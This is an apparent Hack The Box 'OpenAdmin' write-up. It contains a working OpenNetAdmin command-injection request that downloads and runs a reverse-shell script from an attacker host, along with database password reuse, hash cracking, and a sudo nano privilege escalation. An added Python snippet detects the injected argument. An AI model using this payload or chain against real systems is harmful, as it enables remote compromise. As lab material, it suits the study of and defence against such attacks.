HTB{openadmin}
Recon
OpenNetAdmin (ONA) is here, under /ona/.
POST /ona/ HTTP/1.1
Host: 10.10.10.171
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://10.10.10.171/ona/
Method: POST http://10.10.10.171/ona/ HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 156
Connection: close
Cookie: ona_context_name=DEFAULT; ONA_SESSION_ID=4aerblt73idp6e282pgkllshv9
Cache-Control: max-age=0
xajax=window_submit&xajaxr=1580249126544&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;/usr/bin/curl 10.10.14.24:8000/reverse.sh > /tmp/f4d3.sh;bash /tmp/f4d3.sh%26&xajaxargs[]=ping
Got shell!
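A defender-side check for the request above, added here as an example and not part of the original writeup: it pulls the xajaxargs[] values out of a logged POST body and flags any ip=> argument that is not a bare IP address. The function names, the benign sample body and the rule that a legitimate value is only an IP address are assumptions.

```python
import ipaddress
from urllib.parse import unquote_plus

# Assumption: the abused argument is the xajaxargs[] entry starting with "ip=>",
# and a legitimate value after that prefix is nothing but an IP address.
PREFIX = "ip=>"

# POST body exactly as shown in the request above.
PAGE_BODY = (
    "xajax=window_submit&xajaxr=1580249126544&xajaxargs[]=tooltips"
    "&xajaxargs[]=ip%3D%3E;/usr/bin/curl 10.10.14.24:8000/reverse.sh > /tmp/f4d3.sh;"
    "bash /tmp/f4d3.sh%26&xajaxargs[]=ping"
)
# Constructed benign body for comparison (not taken from the page).
BENIGN_BODY = (
    "xajax=window_submit&xajaxr=1580249126544&xajaxargs[]=tooltips"
    "&xajaxargs[]=ip%3D%3E10.10.10.171&xajaxargs[]=ping"
)


def xajax_args(body: str) -> list:
    """Return the decoded xajaxargs[] values of a form-encoded body, in order."""
    args = []
    # Split on raw '&' first so an encoded %26 stays inside its value.
    for pair in body.split("&"):
        name, _, value = pair.partition("=")
        if unquote_plus(name) == "xajaxargs[]":
            args.append(unquote_plus(value))
    return args


def suspicious_ip_args(body: str) -> list:
    """Return every "ip=>" argument whose value is not a plain IP address."""
    hits = []
    for arg in xajax_args(body):
        if not arg.startswith(PREFIX):
            continue
        try:
            # Allow-list check: anything that does not parse as an IP is flagged,
            # which also covers an empty value and any shell metacharacter.
            ipaddress.ip_address(arg[len(PREFIX):].strip())
        except ValueError:
            hits.append(arg)
    return hits


if __name__ == "__main__":
    for label, body in (("page", PAGE_BODY), ("benign", BENIGN_BODY)):
        print(label, suspicious_ip_args(body))
```

Checking against an allow-list (value parses as an IP address) avoids having to enumerate shell metacharacters such as `;`, `&` or `>`.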
In www/local/config/database_settings.php
21232f297a57a5a743894a0e4a801fc3 md5 admin
098f6bcd4621d373cade4e832627b4f6 md5 test
These are useless, but we can reuse the DB password as jimmy :D
We set up a port forward…
The hash
00e302ccdcf1c60b8ad50ea50cf72b939705f49f40f0dc658801b4680b7d758eebdc2e9f9ba8ba3ef8a8bb9a796d34ba2e856838ee9bdde852b8ec3b3a0523b1
crack => Revealed
user.txt:c9b2cf07d40807e62af62660f0c81b5f
Root
For root, we see that we can run nano with sudo :D
GTFOBINS
root.txt:2f907ed450b361b2c2bf4e8795d5b561